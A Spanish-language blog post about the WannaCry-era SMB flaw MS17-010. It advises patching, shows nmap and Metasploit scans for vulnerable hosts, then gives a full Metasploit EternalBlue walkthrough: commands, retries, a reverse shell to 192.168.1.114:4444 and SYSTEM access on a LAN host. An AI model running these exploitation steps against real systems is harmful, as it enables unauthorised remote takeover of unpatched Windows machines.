Después del torbellino mediático de los últimos días, mucha gente que no trabaja en informática o no tiene demasiada idea pregunta: «pisha, y cómo hago para saber si puedo pillar el ransomware ese» y normalmente la respuesta rápida es «actualiza Windows inmediatamente, si es que todavía no lo has hecho«. La razón es obvia, el vector de red que utiliza el ransomware WannaCry es la explotación de la vulnerabilidad en SMB (boletín MS17-010) corregida el 14 de marzo, al igual que hace el famoso ETERNALBLUE liberado por ShadowBrokers.

También podríamos detener la propagación del malware deshabilitando SMBv1 o encomendándonos a San Custodio y que se haya activado un «kill switch» que reconozca la variante que nos estaba acechando pero… ¿para qué arriesgarnos?… actualiza, actualiza, ACTUALIZA!

Ahora bien, si estas en una red y no eres responsable directo de actualizar los equipos M$ de la LAN, quizás te hayan pedido o te resulte interesante }:-) saber cuáles son las máquinas que tienen el puerto 445/TCP accesible y son vulnerables. Para ello podríamos usar el escáner de Metasploit (auxiliary/scanner/smb/smb_ms17_010), aunque resulta algo más lento que el script de nmap que vamos a utilizar en principio, que es el que el pasado domingo publicó el mexicano Paulino Calderon (responsable del chapter @OWASP_riviera).

Lo que hace el script es conectarse a $IPC, ejecutar una transacción sobre FID  y comprobar si es devuelto el error “STATUS_INSUFF_SERVER_RESOURCES” para determinar si ha sido parcheado o no contra CVE2017-010.

https://raw.githubusercontent.com/cldrn/nmap-nse-scripts/master/scripts/smb-vuln-ms17-010.nse

Simplemente tenemos que descargar el script nse en el directorio correspondiente, por defecto:

# Linux – /usr/share/nmap/scripts/ or /usr/local/share/nmap/scripts/
# OSX – /opt/local/share/nmap/scripts/
# Windows – c:\Program Files\Nmap\Scripts

Y ejecutar:

nmap -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse X.X.X.X/X

Ejemplo NO VULNERABLE:

nmap -Pn -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse 192.168.1.22

Starting Nmap 7.12 ( https://nmap.org ) at 2017-05-16 1:56 CEST
Nmap scan report for 192.168.1.66
Host is up (0.00049s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 50:7B:9D:D5:05:CA (Lcfc(hefei) Electronics Technology)

Host script results:
|_smb-vuln-ms17-010: Could not connect to 'IPC$'

Ejemplo VULNERABLE:

# nmap -Pn -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse 192.168.1.23

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-16 2:02 EDT
Nmap scan report for 192.168.1.23
Host is up (0.00069s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|       
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds


Y ya saben, si la máquina es vulnerable conseguir una shell a estas alturas es trivial:

Rescaneamos con el módulo de metasploit por si acaso.

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.23
RHOSTS => 192.168.1.23
msf auxiliary(smb_ms17_010) > run

[+] 192.168.1.23:445     - Host is likely VULNERABLE to MS17-010!  (Windows 7 Professional 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Usamos el exploit https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb:

msf > use windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.23
RHOST => 192.168.1.23
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[-] 192.168.1.23:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.23:445).
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[-] 192.168.1.23:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.23:445).
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > set ProcessName lsass.exe
ProcessName => lsass.exe
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[-] 192.168.1.23:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.23:445).
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[+] 192.168.1.23:445 - Connection established for exploitation.
[*] 192.168.1.23:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.23:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.23:445 - Starting non-paged pool grooming
[+] 192.168.1.23:445 - Sending SMBv2 buffers
[+] 192.168.1.23:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.23:445 - Sending final SMBv2 buffers.
[*] 192.168.1.23:445 - Sending last fragment of exploit packet!
[*] 192.168.1.23:445 - Receiving response from exploit packet
[+] 192.168.1.23:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.23:445 - Sending egg to corrupted connection.
[*] 192.168.1.23:445 - Triggering free of corrupted buffer.
[-] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[+] 192.168.1.23:445 - Connection established for exploitation.
[*] 192.168.1.23:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.23:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.23:445 - Starting non-paged pool grooming
[+] 192.168.1.23:445 - Sending SMBv2 buffers
[+] 192.168.1.23:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.23:445 - Sending final SMBv2 buffers.
[*] 192.168.1.23:445 - Sending last fragment of exploit packet!
[*] 192.168.1.23:445 - Receiving response from exploit packet
[+] 192.168.1.23:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.23:445 - Sending egg to corrupted connection.
[*] 192.168.1.23:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.114:4444 -> 192.168.1.23:1096) at 2017-05-16 11:12:20 -0400
[+] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Versi�n 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\windows\system32>whoami
whoami
nt authority\system

C:\windows\system32>hostname
hostname
WINDOWS-PC1
Visto en: Hackplayers

Compartir